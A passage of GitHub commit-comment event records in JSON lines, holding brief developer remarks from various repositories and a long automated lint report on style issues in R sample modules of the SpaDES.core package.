{"id":"8039859449","type":"CommitCommentEvent","actor":{"login":"Attumm"},"repo":{"name":"Attumm/redis-dict"},"payload":{"comment":{"id":29892725,"position":157,"line":125,"path":"redis_dict.py","commit_id":"002d7e0964fbf47f1b2f28df4faf6c0c8bee7855","created_at":"2018-07-30T19:41:42Z","updated_at":"2018-07-30T19:41:42Z","author_association":"OWNER","body":"It's best to keep the code clean. Python3 is the way to go. But we should still support Python2.\r\nFor the discussion of the commit let's focus on scope and features. After that we can make it compatible for both. "}},"created_at":"2018-07-30T19:41:42Z"}
{"id":"8039868270","type":"CommitCommentEvent","actor":{"login":"cookpa"},"repo":{"name":"ANTsX/ANTs"},"payload":{"comment":{"id":29892748,"position":null,"line":null,"path":null,"commit_id":"b872ef3bd154998377c100fa75788140fc491a39","created_at":"2018-07-30T19:43:25Z","updated_at":"2018-07-30T19:43:25Z","author_association":"COLLABORATOR","body":"The link seems to be about smoothing? Did they fix the metric sampling floor in the same patch?"}},"created_at":"2018-07-30T19:43:25Z"}
{"id":"8039871003","type":"CommitCommentEvent","actor":{"login":"cybertron"},"repo":{"name":"cybertron/openstack-virtual-baremetal"},"payload":{"comment":{"id":29892751,"position":null,"line":null,"path":null,"commit_id":"80e04ee69d2554c98e7c0cef09004bc8bf73afc1","created_at":"2018-07-30T19:43:58Z","updated_at":"2018-07-30T19:43:58Z","author_association":"OWNER","body":"Yeah, that should be totally doable.  The undercloud is already optional, and I don't think there's any reason we couldn't do the same with the BMC.  I'll keep that in mind as I continue with this.  Initially we could even leave the BMC for those extra roles and just have it be an unused instance - it would be a small waste of resources, but it would allow us to get this working and then clean up the BMC abstraction later."}},"created_at":"2018-07-30T19:43:58Z"}
{"id":"8039872667","type":"CommitCommentEvent","actor":{"login":"vinceangeloni"},"repo":{"name":"vinceangeloni/homebridge-augustlock2"},"payload":{"comment":{"id":29892753,"position":null,"line":null,"path":null,"commit_id":"3cd509d18a2e42bd9a918e1a19d2d255f49b2e2b","created_at":"2018-07-30T19:44:16Z","updated_at":"2018-07-30T19:44:16Z","author_association":"OWNER","body":"@msutara Trying to get this platform working on Homebridge but prevents Homebridge from starting with an error. Do you have any insight? I'd love to work with you to get this working."}},"created_at":"2018-07-30T19:44:16Z"}
{"id":"8039872937","type":"CommitCommentEvent","actor":{"login":"danmerron-sig"},"repo":{"name":"hmcts/snl-rules"},"payload":{"comment":{"id":29892755,"position":null,"line":null,"path":null,"commit_id":"6068a3e2bcf6baec4c9cbb03a239c1df8d42b35d","created_at":"2018-07-30T19:44:20Z","updated_at":"2018-07-30T19:44:20Z","author_association":"NONE","body":"If you want to destroy, you don't need to remove the code. You can just remove from portal and it will auto re-build on the next run."}},"created_at":"2018-07-30T19:44:20Z"}
{"id":"8039874035","type":"CommitCommentEvent","actor":{"login":"LiquidZulu"},"repo":{"name":"Exetric/Hybrid-Bot"},"payload":{"comment":{"id":29892759,"position":null,"line":null,"path":null,"commit_id":"f5db0e413254cd8cb109189de84fa5562cea02ac","created_at":"2018-07-30T19:44:32Z","updated_at":"2018-07-30T19:44:32Z","author_association":"NONE","body":"Dude you might want to hide that"}},"created_at":"2018-07-30T19:44:32Z"}
{"id":"8039874444","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29892760,"position":151,"line":151,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/interface.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-30T19:44:37Z","updated_at":"2018-07-30T19:44:37Z","author_association":"NONE","body":"Тут и в 146 строке тоже стоит сменить number на volume. Потому-что так у тебя получается, что есть переменная номер_вагона и номер."}},"created_at":"2018-07-30T19:44:37Z"}
{"id":"8039874915","type":"CommitCommentEvent","actor":{"login":"Stylite"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29892762,"position":null,"line":null,"path":null,"commit_id":"7af94d802f627ef0ae9e712d5f6a542730159e53","created_at":"2018-07-30T19:44:42Z","updated_at":"2018-07-30T19:44:42Z","author_association":"MEMBER","body":"gross"}},"created_at":"2018-07-30T19:44:42Z"}
{"id":"8039876157","type":"CommitCommentEvent","actor":{"login":"guidovarela"},"repo":{"name":"guidovarela/webmaster"},"payload":{"comment":{"id":29892764,"position":null,"line":null,"path":null,"commit_id":"5ed9ef2af75f15347637e0fc392cc0fc88a7e146","created_at":"2018-07-30T19:44:55Z","updated_at":"2018-07-30T19:44:55Z","author_association":"OWNER","body":"No, el titulo es \"\""}},"created_at":"2018-07-30T19:44:55Z"}
{"id":"8039876745","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29892765,"position":null,"line":null,"path":null,"commit_id":"c370f3195f8c667e0465d560019f2033cafab8ee","created_at":"2018-07-30T19:45:02Z","updated_at":"2018-07-30T19:45:02Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the 